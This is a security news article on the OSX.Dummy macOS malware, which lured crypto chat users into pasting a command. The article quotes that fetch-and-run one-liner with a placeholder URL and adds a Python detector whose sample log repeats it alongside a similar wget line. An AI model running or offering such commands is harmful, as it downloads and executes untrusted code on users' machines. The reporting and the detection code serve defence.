A new macOS malware, dubbed OSX.Dummy, has been targeting cryptocurrency investors via both the Slack and Discord chat apps. The malware was first spotted by security researcher Remco Verhoef, who posted details of his findings on the SANS InfoSec Handlers Diary Blog on Friday.
Remco said multiple attacks were observed over the past week where attackers were targeting crypto related chat groups while impersonating admins or key people.
The script users are asked to run:
cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
After a user runs the script, a malicious and unusually large binary (34M) is downloaded and executed on the victim’s system.
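The lure's infection chain (change into a temp directory, fetch a file, mark it executable, run it) is easy to spot in process-audit data. The following check is an added example written for this page, not code from the article or from either researcher's write-up; it assumes command lines are available as plain strings, and the sample log lines are constructed.

```python
import re
import shlex
# Added example (not from the article or the researchers' write-ups): flag shell
# one-liners shaped like the OSX.Dummy lure: cd into a temp dir, fetch a file with
# curl/wget, chmod +x it, run it. Assumption: command lines arrive as plain strings
# from a process-audit log. Sample lines are constructed; $MALICIOUS_URL is the lure's own placeholder.
SAMPLE_LOG = [
    "cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script",
    "cd /tmp && ls -la && cat script",
    "wget -O /tmp/p https://example.invalid/p; chmod 755 /tmp/p; /tmp/p",
]

def _fetch_target(argv):
    """Local file a curl/wget segment writes to (via '> f', curl -o or wget -O)."""
    for flag in (">", {"curl": "-o", "wget": "-O"}[argv[0]]):
        if flag in argv and argv.index(flag) + 1 < len(argv):
            return argv[argv.index(flag) + 1]
    return None

def analyze_command(cmdline):
    """Suspicious traits found in cmdline, in order (segments split on && || ; |)."""
    findings, downloaded = [], set()
    for seg in re.split(r"&&|\|\||;|\|", cmdline):
        try:
            argv = shlex.split(seg)
        except ValueError:  # unbalanced quotes: fall back to a plain split
            argv = seg.split()
        if not argv:
            continue
        if argv[0] == "cd" and len(argv) > 1 and argv[1].startswith(("/tmp", "/var/tmp")):
            findings.append("changes into world-writable temp dir")
        elif argv[0] in ("curl", "wget") and (target := _fetch_target(argv)):
            downloaded.add(target)
            findings.append(f"downloads to file {target}")
        elif argv[0] == "chmod" and len(argv) >= 3 and argv[-1] in downloaded:
            mode = argv[1]  # symbolic (+x) or octal (755) with any execute bit set
            if "x" in mode or (mode.isdigit() and int(mode, 8) & 0o111):
                findings.append(f"marks {argv[-1]} executable")
        elif argv[0].removeprefix("./") in downloaded:
            findings.append(f"executes downloaded file {argv[0].removeprefix('./')}")
    return findings

def is_download_and_execute(cmdline):
    """True when a file fetched in the one-liner is also executed by it."""
    return {"downloads", "executes"} <= {f.split()[0] for f in analyze_command(cmdline)}

def flagged_samples(lines=SAMPLE_LOG):
    """Command lines from the log that match the full download-and-execute chain."""
    return [line for line in lines if is_download_and_execute(line)]
```

The pipe-to-shell variant (fetch piped straight into sh) is deliberately outside this check, which only covers the save, chmod and run shape the lure uses.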
Security researcher Patrick Wardle wrote up additional details on the malware threat on his Objective-See blog.
In conclusion, the malware is quite ‘dumb’ in terms of its infection method, binary size, persistence mechanism and limited capabilities, so the name is quite fitting.